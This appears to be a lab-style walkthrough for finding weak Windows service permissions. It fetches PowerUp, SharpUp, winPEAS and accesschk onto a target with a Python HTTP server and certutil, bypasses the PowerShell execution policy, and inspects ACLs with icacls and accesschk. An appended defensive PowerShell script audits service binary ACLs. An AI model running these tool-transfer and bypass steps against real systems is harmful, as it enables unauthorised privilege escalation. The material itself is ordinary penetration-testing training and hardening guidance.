ENUMERATING SERVICE PERMISSIONS WITH POWERUP
- If you don’t already have PowerUp, you can get PowerUp.ps1 using the following command:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
- Host the PowerUp.ps1 script using Python:
python3 -m http.server 8000
- Transfer the script to the target machine using certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/PowerUp.ps1 PowerUp.ps1
- To bypass the PowerShell execution policy and execute PowerUp.ps1 in a single line:
powershell -ep bypass -c "& {.\PowerUp.ps1}"
ENUMERATING SERVICE PERMISSIONS WITH SHARPUP
SharpUp is a free and open-source tool that can check for weaknesses in Windows services. It can scan for a variety of vulnerabilities related to standard privesc techniques.
- If you don’t already have SharpUp, you can get SharpUp.exe using the following command:
wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe
- Host SharpUp.exe using Python:
python3 -m http.server 8000
- Transfer the binary to the target machine using certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/SharpUp.exe SharpUp.exe
- To run all the checks, execute the audit command. The tool has identified the filepermsvc service as vulnerable to modification, as shown below.
.\SharpUp.exe audit
ENUMERATING SERVICE PERMISSIONS WITH WINPEAS
- Since the target runs a 64-bit OS, we can send 64-bit winPEAS via a Python HTTP server:
python3 -m http.server 8000
NOTE: We can identify that the target machine has a 64-bit architecture using the following command:
systeminfo | findstr /B /C:"System Type"
- Transfer winPEAS to the target machine using certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe
- Now, all we need to do is run winPEAS to search for weak service permissions:
.\winPEASx64.exe
NOTE: The Services Information section in winPEAS provides a comprehensive list of all services, along with their configurations and potential security issues.
ENUMERATING WEAK SERVICE FILE PERMISSIONS (ICACLS)
- To verify folder permissions with icacls, it's important to understand the permissions.
Check Microsoft documentation to learn more about permissions.
- Let's view the permissions on the c:\Program Files\File folder:
icacls "C:\Program Files\File Permissions Service"
NOTE: This shows that BUILTIN\Users have (RX) Read & Execute permissions for this folder.
- We can also check the permissions of the binary itself:
icacls "C:\Program Files\File Permissions Service\filepermservice.exe"
NOTE: This shows that Everyone has (F) Full Control permissions for C:\Program Files\File Permissions Service\filepermservice.exe, allowing any user to read, execute, modify, or delete the service binary.
ENUMERATING WEAK SERVICE FILE PERMISSIONS (ACCESSCHK)
- If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft website.
NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
systeminfo | findstr /B /C:"System Type"
- Host the binary using a Python HTTP server and transfer it to the target machine with certutil:
certutil -urlcache -f http://[IP-ADDRESS]:8000/accesschk64.exe accesschk64.exe
NOTE: With accesschk now on the target system, we can use the following command to enumerate the folder permissions.
- Let's view the permissions on C:\Program Files\File Permissions Service\filepermservice.exe:
.\accesschk64.exe -wvu "C:\Program Files\File Permissions Service\filepermservice.exe" -accepteula
NOTE: This shows that Everyone has (RW) Read and Write permissions for C:\Program Files\File Permissions Service\filepermservice.exe, granting any user full access to read, execute, modify, or delete the service binary.
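
The icacls and accesschk checks above inspect one service by hand. As an added example (not part of the original page or of any tool it mentions), the PowerShell audit below applies the same check to every service on a host you administer and lists ACEs that give broad groups write access to a service binary or its folder. The function names, the SID list and the write mask are assumptions chosen for this example.

```powershell
# Added audit example. Assumes Windows PowerShell 5.1+ and read access to the
# service binaries. Services whose path cannot be resolved are skipped.
$broadSids = @{                       # well-known SIDs, locale independent
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# Bits that allow replacing or re-permissioning a file (on a folder, WriteData
# is "create files"), plus GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000)
$fileWrite = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$writeBits = [int]$fileWrite -bor 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted form: "C:\dir with spaces\svc.exe" args. Unquoted: up to the first .exe
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $null
}

function Get-WeakServiceBinaryAce {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        # Check the binary and its parent folder, as the manual steps do
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
            foreach ($ace in $rules) {
                $sid = $ace.IdentityReference.Value
                if ($ace.AccessControlType -ne 'Allow' -or -not $broadSids.ContainsKey($sid)) { continue }
                # Inherit-only ACEs do not apply to the object itself
                if ($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
                if (([int]$ace.FileSystemRights -band $writeBits) -eq 0) { continue }
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Path      = $target
                    Principal = $broadSids[$sid]
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

Get-WeakServiceBinaryAce | Format-Table -AutoSize
```

Each row returned is an ACE to tighten so that only administrators and SYSTEM can modify the service binary or create files next to it.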